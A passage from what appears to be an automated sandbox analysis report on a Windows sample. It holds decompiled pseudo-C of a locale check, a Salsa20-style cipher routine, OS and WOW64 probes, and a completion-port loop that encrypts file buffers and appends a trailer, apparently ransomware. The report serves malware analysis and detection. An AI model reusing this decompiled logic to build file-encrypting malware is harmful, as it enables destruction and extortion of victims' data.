													goto L52;
												} else {
													if(0xbadbb9 == _t29 || 0xbadbb9 == _t28) {
														goto L52;
													} else {
														if(0xbadbb8 == _t29 || 0xbadbb8 == _t28) {
															goto L52;
														} else {
															if(0xbadbb9 == _t29 || 0xbadbb9 == _t28) {
																goto L52;
															} else {
																if(0xbadb3d == _t29 || 0xbadb3d == _t28) {
																	goto L52;
																} else {
																	if(0xbadb3e == _t29 || 0xbadb3e == _t28) {
																		goto L52;
																	} else {
																		if(0xbadb0b == _t29 || 0xbadb0b == _t28) {
																			goto L52;
																		} else {
																			if(0xbadb64 == _t29 || 0xbadb64 == _t28) {
																				goto L52;
																			} else {
																				if(0xbad2a0 == _t29 || 0xbad2a0 == _t28) {
																					L52:
																					return 1;
																				} else {
																					return 0;
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x00ce4825
0x00ce482d
0x00ce483e
0x00000000
0x00ce484a
0x00ce4850
0x00000000
0x00ce485c
0x00ce4861
0x00000000
0x00ce486d
0x00ce4873
0x00000000
0x00ce487f
0x00ce4885
0x00000000
0x00ce4891
0x00ce4896
0x00000000
0x00ce48a2
0x00ce48a8
0x00000000
0x00ce48b4
0x00ce48ba
0x00000000
0x00ce48c6
0x00ce48cb
0x00000000
0x00ce48d7
0x00ce48dd
0x00000000
0x00ce48e6
0x00ce48ec
0x00000000
0x00ce48f5
0x00ce48fa
0x00000000
0x00ce4903
0x00ce490e
0x00000000
0x00ce4917
0x00ce491c
0x00000000
0x00ce4925
0x00ce492b
0x00000000
0x00ce4934
0x00ce493a
0x00000000
0x00ce4943
0x00ce494f
0x00ce495f
0x00ce4965
0x00ce4958
0x00ce495e
0x00ce495e
0x00ce494f
0x00ce493a
0x00ce492b
0x00ce491c
0x00ce490e
0x00ce48fa
0x00ce48ec
0x00ce48dd
0x00ce48cb
0x00ce48ba
0x00ce48a8
0x00ce4896
0x00ce4885
0x00ce4873
0x00ce4861
0x00ce4850

APIs

GetSystemDefaultUILanguage.KERNEL32(00000000,00CE736F,?,?,?,?,00000000), ref: 00CE481F
GetUserDefaultLangID.KERNEL32(?,?,?,?,00000000), ref: 00CE4827

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: Default$LangLanguageSystemUser
String ID:
API String ID: 4175731448-0
Opcode ID: 9fe4a306b5d6358894490f3badbd0023fdc2ecb9c96347bcf02d40b1804e7b3b
Instruction ID: 88d171c78059d5c6757fdb166652a333f2c1742d27666b866cb3a822bee2dbf5
Opcode Fuzzy Hash: 9fe4a306b5d6358894490f3badbd0023fdc2ecb9c96347bcf02d40b1804e7b3b
Instruction Fuzzy Hash: 2021B316BC75C387FF7EE82382817F7924CA3107A0DEE5013C5BAA318B41481F91A627

Uniqueness

Uniqueness Score: -1.00%

Function 00CE209C, Relevance: 1.6, Strings: 1, Instructions: 337
COMMONCrypto

Download Yara Rule

C-Code - Quality: 43%

			E00CE209C(intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				char _v5;
				char _v84;
				char _v164;
				char _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _t122;
				signed int _t123;
				signed int _t125;
				signed int _t127;
				signed int _t129;
				signed int _t131;
				signed int _t133;
				signed int _t135;
				signed int _t137;
				intOrPtr _t142;
				signed int _t144;
				signed int _t146;
				signed int _t148;
				signed int _t150;
				signed int _t152;
				signed int _t154;
				signed int _t156;
				signed int _t158;
				signed int _t159;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t167;
				signed int _t169;
				signed int _t171;
				signed int _t173;
				signed int _t175;
				intOrPtr _t176;
				intOrPtr _t177;
				signed int _t178;
				signed int _t179;
				signed int _t180;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				signed int _t188;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				signed int _t194;
				intOrPtr _t195;
				signed int* _t197;
				signed int _t198;
				intOrPtr _t199;
				signed int _t270;
				signed int _t271;

				_v248 =  &_v84 + 0x0000000f & 0xfffffff0;
				_v252 =  &_v164 + 0x0000000f & 0xfffffff0;
				_t122 =  &_v244 + 0x0000000f & 0xfffffff0;
				_v256 = _t122;
				if(_a16 != 0) {
					asm("xorps xmm0, xmm0");
					asm("movups [esi], xmm0");
					asm("movups [esi+0x10], xmm0");
					asm("movups [esi+0x20], xmm0");
					asm("movups [esi+0x30], xmm0");
					asm("movups xmm0, [esi]");
					asm("movups xmm1, [esi+0x10]");
					asm("movups xmm2, [esi+0x20]");
					asm("movups xmm3, [esi+0x30]");
					asm("movups [edi], xmm0");
					asm("movups [edi+0x10], xmm1");
					asm("movups [edi+0x20], xmm2");
					asm("movups [edi+0x30], xmm3");
					do {
						if(_a16 < 0x40) {
							_v260 = _a12;
							_t194 = _v256;
							_t198 = _t194;
							_t270 = _a8;
							_t176 = _a16;
							do {
								 *((char*)(_t198 + _t176 - 1)) =  *((intOrPtr*)(_t270 + _t176 - 1));
								_t176 = _t176 - 1;
							} while (_t176 != 0);
							_a8 = _t194;
							_a12 = _t194;
						}
						_t197 = _v252;
						asm("movups xmm0, [esi]");
						asm("movups xmm1, [esi+0x10]");
						asm("movups xmm2, [esi+0x20]");
						asm("movups xmm3, [esi+0x30]");
						asm("movups [edi], xmm0");
						asm("movups [edi+0x10], xmm1");
						asm("movups [edi+0x20], xmm2");
						asm("movups [edi+0x30], xmm3");
						_push(_v248);
						do {
							_t123 =  *_t197;
							_t178 = _t197[0xc];
							asm("rol esi, 0x7");
							_t144 = _t197[4] ^ _t123 + _t178;
							asm("rol esi, 0x9");
							_t161 = _t197[8] ^ _t144 + _t123;
							asm("rol esi, 0xd");
							_t179 = _t178 ^ _t161 + _t144;
							asm("rol esi, 0x12");
							 *_t197 = _t123 ^ _t179 + _t161;
							_t197[4] = _t144;
							_t197[8] = _t161;
							_t197[0xc] = _t179;
							_t125 = _t197[5];
							_t180 = _t197[1];
							asm("rol esi, 0x7");
							_t146 = _t197[9] ^ _t125 + _t180;
							asm("rol esi, 0x9");
							_t163 = _t197[0xd] ^ _t146 + _t125;
							asm("rol esi, 0xd");
							_t181 = _t180 ^ _t163 + _t146;
							asm("rol esi, 0x12");
							_t197[5] = _t125 ^ _t181 + _t163;
							_t197[9] = _t146;
							_t197[0xd] = _t163;
							_t197[1] = _t181;
							_t127 = _t197[0xa];
							_t182 = _t197[6];
							asm("rol esi, 0x7");
							_t148 = _t197[0xe] ^ _t127 + _t182;
							asm("rol esi, 0x9");
							_t165 = _t197[2] ^ _t148 + _t127;
							asm("rol esi, 0xd");
							_t183 = _t182 ^ _t165 + _t148;
							asm("rol esi, 0x12");
							_t197[0xa] = _t127 ^ _t183 + _t165;
							_t197[0xe] = _t148;
							_t197[2] = _t165;
							_t197[6] = _t183;
							_t129 = _t197[0xf];
							_t184 = _t197[0xb];
							asm("rol esi, 0x7");
							_t150 = _t197[3] ^ _t129 + _t184;
							asm("rol esi, 0x9");
							_t167 = _t197[7] ^ _t150 + _t129;
							asm("rol esi, 0xd");
							_t185 = _t184 ^ _t167 + _t150;
							asm("rol esi, 0x12");
							_t197[0xf] = _t129 ^ _t185 + _t167;
							_t197[3] = _t150;
							_t197[7] = _t167;
							_t197[0xb] = _t185;
							_t131 =  *_t197;
							_t186 = _t197[3];
							asm("rol esi, 0x7");
							_t152 = _t197[1] ^ _t131 + _t186;
							asm("rol esi, 0x9");
							_t169 = _t197[2] ^ _t152 + _t131;
							asm("rol esi, 0xd");
							_t187 = _t186 ^ _t169 + _t152;
							asm("rol esi, 0x12");
							 *_t197 = _t131 ^ _t187 + _t169;
							_t197[1] = _t152;
							_t197[2] = _t169;
							_t197[3] = _t187;
							_t133 = _t197[5];
							_t188 = _t197[4];
							asm("rol esi, 0x7");
							_t154 = _t197[6] ^ _t133 + _t188;
							asm("rol esi, 0x9");
							_t171 = _t197[7] ^ _t154 + _t133;
							asm("rol esi, 0xd");
							_t189 = _t188 ^ _t171 + _t154;
							asm("rol esi, 0x12");
							_t197[5] = _t133 ^ _t189 + _t171;
							_t197[6] = _t154;
							_t197[7] = _t171;
							_t197[4] = _t189;
							_t135 = _t197[0xa];
							_t190 = _t197[9];
							asm("rol esi, 0x7");
							_t156 = _t197[0xb] ^ _t135 + _t190;
							asm("rol esi, 0x9");
							_t173 = _t197[8] ^ _t156 + _t135;
							asm("rol esi, 0xd");
							_t191 = _t190 ^ _t173 + _t156;
							asm("rol esi, 0x12");
							_t197[0xa] = _t135 ^ _t191 + _t173;
							_t197[0xb] = _t156;
							_t197[8] = _t173;
							_t197[9] = _t191;
							_t137 = _t197[0xf];
							_t192 = _t197[0xe];
							asm("rol esi, 0x7");
							_t158 = _t197[0xc] ^ _t137 + _t192;
							asm("rol esi, 0x9");
							_t175 = _t197[0xd] ^ _t158 + _t137;
							asm("rol esi, 0xd");
							_t193 = _t192 ^ _t175 + _t158;
							asm("rol esi, 0x12");
							_t122 = _t137 ^ _t193 + _t175;
							_t197[0xf] = _t122;
							_t197[0xc] = _t158;
							_t197[0xd] = _t175;
							_t197[0xe] = _t193;
						} while ( &_v5 != 0);
						_pop(_t272);
						asm("movq mm0, [edi]");
						asm("movq mm1, [edi+0x8]");
						asm("movq mm2, [edi+0x10]");
						asm("movq mm3, [edi+0x18]");
						asm("movq mm4, [edi+0x20]");
						asm("movq mm5, [edi+0x28]");
						asm("movq mm6, [edi+0x30]");
						asm("movq mm7, [edi+0x38]");
						asm("paddd mm0, [esi]");
						asm("paddd mm1, [esi+0x8]");
						asm("paddd mm2, [esi+0x10]");
						asm("paddd mm3, [esi+0x18]");
						asm("paddd mm4, [esi+0x20]");
						asm("paddd mm5, [esi+0x28]");
						asm("paddd mm6, [esi+0x30]");
						asm("paddd mm7, [esi+0x38]");
						asm("movq [edi], mm0");
						asm("movq [edi+0x8], mm1");
						asm("movq [edi+0x10], mm2");
						asm("movq [edi+0x18], mm3");
						asm("movq [edi+0x20], mm4");
						asm("movq [edi+0x28], mm5");
						asm("movq [edi+0x30], mm6");
						asm("movq [edi+0x38], mm7");
						asm("movups xmm0, [esi]");
						asm("movups xmm1, [esi+0x10]");
						asm("movups xmm2, [esi+0x20]");
						asm("movups xmm3, [esi+0x30]");
						asm("xorps xmm0, [edi]");
						asm("xorps xmm1, [edi+0x10]");
						asm("xorps xmm2, [edi+0x20]");
						asm("xorps xmm3, [edi+0x30]");
						asm("movups [esi], xmm0");
						asm("movups [esi+0x10], xmm1");
						asm("movups [esi+0x20], xmm2");
						asm("movups [esi+0x30], xmm3");
						_t159 = _v248;
						 *((intOrPtr*)(_t159 + 0x20)) =  *((intOrPtr*)(_t159 + 0x20)) + 1;
						if( *((intOrPtr*)(_t159 + 0x20)) == 0) {
							 *((intOrPtr*)(_t159 + 0x24)) =  *((intOrPtr*)(_t159 + 0x24)) + 1;
						}
						if(_a16 <= 0x40 && _a16 < 0x40) {
							_t177 = _a16;
							_t271 = _a12;
							_t199 = _v260;
							do {
								 *((char*)(_t199 + _t177 - 1)) =  *((intOrPtr*)(_t271 + _t177 - 1));
								_t177 = _t177 - 1;
							} while (_t177 != 0);
							_t195 = _a4;
							 *((intOrPtr*)(_t195 + 0x20)) =  *((intOrPtr*)(_t159 + 0x20));
							_t142 =  *((intOrPtr*)(_t159 + 0x24));
							 *((intOrPtr*)(_t195 + 0x24)) = _t142;
							return _t142;
						}
						_a12 = _a12 + 0x40;
						_a8 = _a8 + 0x40;
						_a16 = _a16 - 0x40;
					} while (_a16 != 0);
				}
				return _t122;
			}

0x00ce20b3
0x00ce20c5
0x00ce20d4
0x00ce20d7
0x00ce20e1
0x00ce20ed
0x00ce20f0
0x00ce20f3
0x00ce20f7
0x00ce20fb
0x00ce2108
0x00ce210b
0x00ce210f
0x00ce2113
0x00ce2117
0x00ce211a
0x00ce211e
0x00ce2122
0x00ce2126
0x00ce212a
0x00ce212f
0x00ce2135
0x00ce213b
0x00ce213d
0x00ce2140
0x00ce2143
0x00ce2147
0x00ce214b
0x00ce214c
0x00ce2150
0x00ce2153
0x00ce2153
0x00ce215c
0x00ce2162
0x00ce2165
0x00ce2169
0x00ce216d
0x00ce2171
0x00ce2174
0x00ce2178
0x00ce217c
0x00ce2181
0x00ce2187
0x00ce2187
0x00ce218f
0x00ce2196
0x00ce2199
0x00ce219f
0x00ce21a2
0x00ce21a8
0x00ce21ab
0x00ce21b1
0x00ce21b6
0x00ce21b8
0x00ce21bb
0x00ce21be
0x00ce21c1
0x00ce21ca
0x00ce21d1
0x00ce21d4
0x00ce21da
0x00ce21dd
0x00ce21e3
0x00ce21e6
0x00ce21ec
0x00ce21f1
0x00ce21f4
0x00ce21f7
0x00ce21fa
0x00ce21fd
0x00ce2206
0x00ce220d
0x00ce2210
0x00ce2216
0x00ce2219
0x00ce221f
0x00ce2222
0x00ce2228
0x00ce222d
0x00ce2230
0x00ce2233
0x00ce2236
0x00ce2239
0x00ce2242
0x00ce2249
0x00ce224c
0x00ce2252
0x00ce2255
0x00ce225b
0x00ce225e
0x00ce2264
0x00ce2269
0x00ce226c
0x00ce226f
0x00ce2272
0x00ce2275
0x00ce227d
0x00ce2284
0x00ce2287
0x00ce228d
0x00ce2290
0x00ce2296
0x00ce2299
0x00ce229f
0x00ce22a4
0x00ce22a6
0x00ce22a9
0x00ce22ac
0x00ce22af
0x00ce22b8
0x00ce22bf
0x00ce22c2
0x00ce22c8
0x00ce22cb
0x00ce22d1
0x00ce22d4
0x00ce22da
0x00ce22df
0x00ce22e2
0x00ce22e5
0x00ce22e8
0x00ce22eb
0x00ce22f4
0x00ce22fb
0x00ce22fe
0x00ce2304
0x00ce2307
0x00ce230d
0x00ce2310
0x00ce2316
0x00ce231b
0x00ce231e
0x00ce2321
0x00ce2324
0x00ce2327
0x00ce2330
0x00ce2337
0x00ce233a
0x00ce2340
0x00ce2343
0x00ce2349
0x00ce234c
0x00ce2352
0x00ce2355
0x00ce2357
0x00ce235a
0x00ce235d
0x00ce2360
0x00ce2364
0x00ce236d
0x00ce236e
0x00ce2371
0x00ce2375
0x00ce2379
0x00ce237d
0x00ce2381
0x00ce2385
0x00ce2389
0x00ce238d
0x00ce2390
0x00ce2394
0x00ce2398
0x00ce239c
0x00ce23a0
0x00ce23a4
0x00ce23a8
0x00ce23ac
0x00ce23af
0x00ce23b3
0x00ce23b7
0x00ce23bb
0x00ce23bf
0x00ce23c3
0x00ce23c7
0x00ce23ce
0x00ce23d1
0x00ce23d5
0x00ce23d9
0x00ce23dd
0x00ce23e0
0x00ce23e4
0x00ce23e8
0x00ce23ef
0x00ce23f2
0x00ce23f6
0x00ce23fa
0x00ce23fe
0x00ce2404
0x00ce240b
0x00ce240d
0x00ce240d
0x00ce2414
0x00ce241c
0x00ce241f
0x00ce2422
0x00ce2428
0x00ce242c
0x00ce2430
0x00ce2431
0x00ce2435
0x00ce243b
0x00ce243e
0x00ce2441
0x00000000
0x00ce2441
0x00ce2446
0x00ce244a
0x00ce244e
0x00ce2452
0x00ce2126
0x00ce2464

Strings

@, xrefs: 00CE2126

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 18ad636fd247c377b08161490afa645b743f930d5ea7395dcc324908aaa8e533
Instruction ID: 8d90ae166ed21bf4870f05da3f767e4bc6206344fc680d55ea008523b53a98ca
Opcode Fuzzy Hash: 18ad636fd247c377b08161490afa645b743f930d5ea7395dcc324908aaa8e533
Instruction Fuzzy Hash: 76E13772D14F6A9BC368CF29C580591F3E0BF58220B06976ADC5DA3B01E775BDA18BC0

Uniqueness

Uniqueness Score: -1.00%

Function 00CE285C, Relevance: 1.5, APIs: 1, Instructions: 33
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE285C(void* _a4, signed int* _a8) {
				void _v8;
				void* _t12;

				_t12 = 0;
				if(NtQueryInformationProcess(_a4, 0x1a,  &_v8, 4, 0) == 0) {
					 *_a8 = 0 | _v8 != 0x00000000;
					_t12 = 1;
				}
				return _t12;
			}

0x00ce2867
0x00ce287e
0x00ce288b
0x00ce288d
0x00ce288d
0x00ce2898

APIs

NtQueryInformationProcess.NTDLL(00CED4DD,0000001A,00000010,00000004,00000000), ref: 00CE2876

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 585cb99968e2edfa32bcf96db79a1672febefe3488d9b47327b1690be2a02eda
Instruction ID: 83ade9de0475eb3b192ae6a9be19c0faf0fd716694606620b61d9d482c23f3b8
Opcode Fuzzy Hash: 585cb99968e2edfa32bcf96db79a1672febefe3488d9b47327b1690be2a02eda
Instruction Fuzzy Hash: 10E02B3230520CBFE3109E659C42FBBB76CE745731F20423AFA14C21D0E6315E04C2A4

Uniqueness

Uniqueness Score: -1.00%

Function 00CE5650, Relevance: 1.5, APIs: 1, Instructions: 14
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE5650(void** _a4) {
				void* _v12;

				return NtQueryInformationFile( *_a4,  &_v12, _a4[1], 0x10000, 9);
			}

0x00ce5672

APIs

NtQueryInformationFile.NTDLL(?,?,?,00010000,00000009), ref: 00CE5669

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID: FileInformationQuery
String ID:
API String ID: 365787318-0
Opcode ID: 073c7f89b0f64e34fb0fea165b0531c7b02809f24173860aed82452b43181558
Instruction ID: 2660bc71ab97fe6b9ea5b55702e6e6a1d481f81d1beaa407aec14a5d44f71057
Opcode Fuzzy Hash: 073c7f89b0f64e34fb0fea165b0531c7b02809f24173860aed82452b43181558
Instruction Fuzzy Hash: 17D0A73510010C7BC6108B90DC05FA97B29D705714F204254BE14591E1EA736560D7D5

Uniqueness

Uniqueness Score: -1.00%

Function 00CE1F0F, Relevance: .1, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE1F0F() {
				intOrPtr _t3;
				intOrPtr _t14;
				intOrPtr _t15;

				_t3 =  *[fs:0x30];
				_t15 =  *((intOrPtr*)(_t3 + 0xa4));
				_t14 =  *((intOrPtr*)(_t3 + 0xa8));
				if(_t15 != 5 || _t14 >= 1) {
					if(_t15 >= 5) {
						if(_t15 != 5 || _t14 != 1) {
							if(_t15 != 5 || _t14 != 2) {
								if(_t15 != 6 || _t14 != 0) {
									if(_t15 != 6 || _t14 != 1) {
										if(_t15 != 6 || _t14 != 2) {
											if(_t15 != 6 || _t14 != 3) {
												if(_t15 != 0xa || _t14 != 0) {
													if(_t15 != 0xa || _t14 <= 0) {
														if(_t15 <= 0xa) {
															return 0xffffffff;
														} else {
															goto L28;
														}
													} else {
														L28:
														return 0x7fffffff;
													}
												} else {
													return 0x64;
												}
											} else {
												return 0x3f;
											}
										} else {
											return 0x3e;
										}
									} else {
										return 0x3d;
									}
								} else {
									return 0x3c;
								}
							} else {
								return 0x34;
							}
						} else {
							return 0x33;
						}
					} else {
						goto L3;
					}
				} else {
					L3:
					return 0;
				}
			}

0x00ce1f14
0x00ce1f1a
0x00ce1f20
0x00ce1f29
0x00ce1f33
0x00ce1f48
0x00ce1f62
0x00ce1f7c
0x00ce1f92
0x00ce1fa9
0x00ce1fc0
0x00ce1fd7
0x00ce1fed
0x00ce1ff7
0x00ce200e
0x00000000
0x00000000
0x00000000
0x00ce1ff9
0x00ce1ff9
0x00ce2003
0x00ce2003
0x00ce1fdd
0x00ce1fe7
0x00ce1fe7
0x00ce1fc7
0x00ce1fd1
0x00ce1fd1
0x00ce1fb0
0x00ce1fba
0x00ce1fba
0x00ce1f99
0x00ce1fa3
0x00ce1fa3
0x00ce1f82
0x00ce1f8c
0x00ce1f8c
0x00ce1f69
0x00ce1f73
0x00ce1f73
0x00ce1f4f
0x00ce1f59
0x00ce1f59
0x00000000
0x00000000
0x00000000
0x00ce1f35
0x00ce1f35
0x00ce1f3f
0x00ce1f3f

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8dc3ae8199320b4cd15d2768583a48420477e7bda455dc5c36651bf6684b48c
Instruction ID: 580bba38d1802887987e5426e8c4e14f0d8d8e504f4f05a31ddf6a5f93709e7e
Opcode Fuzzy Hash: e8dc3ae8199320b4cd15d2768583a48420477e7bda455dc5c36651bf6684b48c
Instruction Fuzzy Hash: 23215C7BF091A00EED3460CFB1906FD8345C3D53B2F2A0177E97887280A6365EAA42E5

Uniqueness

Uniqueness Score: -1.00%

Function 00CE7E49, Relevance: .0, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE7E49() {

				return  *((intOrPtr*)( *[fs:0x30] + 8));
			}

0x00ce7e52

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d52efd4ccfc118cda6168b9822e91f6e5b773300762ffd42b5ba8f775ef5dad3
Instruction ID: 9180e7baaeae989ff3c897d83f808c4d4ddb20176965510cfe36b3daa94390b6
Opcode Fuzzy Hash: d52efd4ccfc118cda6168b9822e91f6e5b773300762ffd42b5ba8f775ef5dad3
Instruction Fuzzy Hash: 20A00235652980CFCE12CB08C298F00B3F4F744B40F054490E405C7A21C228ED40C900

Uniqueness

Uniqueness Score: -1.00%

Function 00CE7E53, Relevance: .0, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE7E53() {

				return  *((intOrPtr*)( *[fs:0x30] + 0x18));
			}

0x00ce7e5c

Memory Dump Source

Source File: 00000000.00000002.429778441.0000000000CE1000.00000020.00020000.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000000.00000002.429765802.0000000000CE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429802114.0000000000CE9000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.429817395.0000000000CEA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429831697.0000000000CEC000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.429844644.0000000000CED000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429866265.0000000000CF0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.429884054.0000000000CF3000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb1dcb45eca10bbd415de50d8dac458e7e42156cf4c282332bc7bc400f2a61b4
Instruction ID: 09a661d3bcde169e3a68bda8983e2d082d1c510c2daa6ab026a58b72df35bac7
Opcode Fuzzy Hash: fb1dcb45eca10bbd415de50d8dac458e7e42156cf4c282332bc7bc400f2a61b4
Instruction Fuzzy Hash: 3AA00235692980CFCE16CF08C290F0073B4F754B40F010490E401C7A21C228ED40C940

Uniqueness

Uniqueness Score: -1.00%

Function 00CE5BCC, Relevance: 27.2, APIs: 18, Instructions: 182
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00CE5BCC() {
				struct _OVERLAPPED* _v8;
				long _v12;
				long _v16;
				char _v144;
				int _t54;
				long _t55;
				intOrPtr _t73;
				void* _t92;
				void* _t95;

				while(1) {
					_t54 = GetQueuedCompletionStatus( *0xcf1024,  &_v12,  &_v16,  &_v8, 0xffffffff);
					_t92 = _v8;
					if(_t54 == 0) {
					}
					L2:
					if( *[fs:0x34] != 0x26) {
						L4:
						CloseHandle( *(_t92 + 0x2c));
						RtlFreeHeap( *0xcf0a9e, 0, _t92);
						while(1) {
							_t54 = GetQueuedCompletionStatus( *0xcf1024,  &_v12,  &_v16,  &_v8, 0xffffffff);
							_t92 = _v8;
							if(_t54 == 0) {
							}
							goto L7;
						}
						goto L2;
					}
					L3:
					 *(_t92 + 0x30) = 2;
					if(PostQueuedCompletionStatus( *0xcf1024, 0, 0, _t92) != 0) {
						continue;
					}
					goto L4;
					L7:
					if(_t92 != 0) {
						_t55 =  *(_t92 + 0x30);
						if(_t55 != 0) {
							if(_t55 != 1) {
								if(_t55 != 2) {
									if(_t55 != 4) {
										L39:
										continue;
									}
									while( *_t92 == 0x103) {
										Sleep(0);
									}
									if( *0xcf092c != 0) {
										 *0xcf0cfa( &_v144, 0xceb4cc,  *(_t92 + 0x2c));
										_t95 = _t95 + 0xc;
										E00CE3E63( *0xcf092c, 0xceb20a, 0xceb4e8,  &_v144, 0);
									}
									CloseHandle( *(_t92 + 0x2c));
									RtlFreeHeap( *0xcf0a9e, 0, _t92);
									InterlockedIncrement(0xcf103c);
									goto L39;
								}
								 *(_t92 + 8) = 0xffffffff;
								 *(_t92 + 0xc) = 0xffffffff;
								 *(_t92 + 0x30) = 4;
								if(WriteFile( *(_t92 + 0x2c), _t92 + 0x74, 0x90,  &_v12, _t92) == 0 &&  *[fs:0x34] != 0x3e5) {
									CloseHandle( *(_t92 + 0x2c));
									RtlFreeHeap( *0xcf0a9e, 0, _t92);
								}
								continue;
							}
							E00CE209C(_t92 + 0x34, _t92 + 0x104, _t92 + 0x104, _v12);
							if( *((intOrPtr*)(_t92 + 0x24)) == 0) {
								_t73 =  *((intOrPtr*)(_t92 + 0x1c));
								if( *((intOrPtr*)(_t92 + 0x20)) != 0xffffffff || _t73 != 0xffffffff) {
									 *(_t92 + 0x14) =  *(_t92 + 0x14) + _t73;
									asm("adc [ebx+0x18], edx");
									 *((intOrPtr*)(_t92 + 0x24)) =  *((intOrPtr*)(_t92 + 0x28));
									 *(_t92 + 0x30) = 0;
								} else {
									 *(_t92 + 0x30) = 2;
								}
							} else {
								 *(_t92 + 0x14) =  *(_t92 + 0x14) + 0x80000;
								asm("adc dword [ebx+0x18], 0x0");
								 *((intOrPtr*)(_t92 + 0x24)) =  *((intOrPtr*)(_t92 + 0x24)) - 1;
								 *(_t92 + 0x30) = 0;
							}
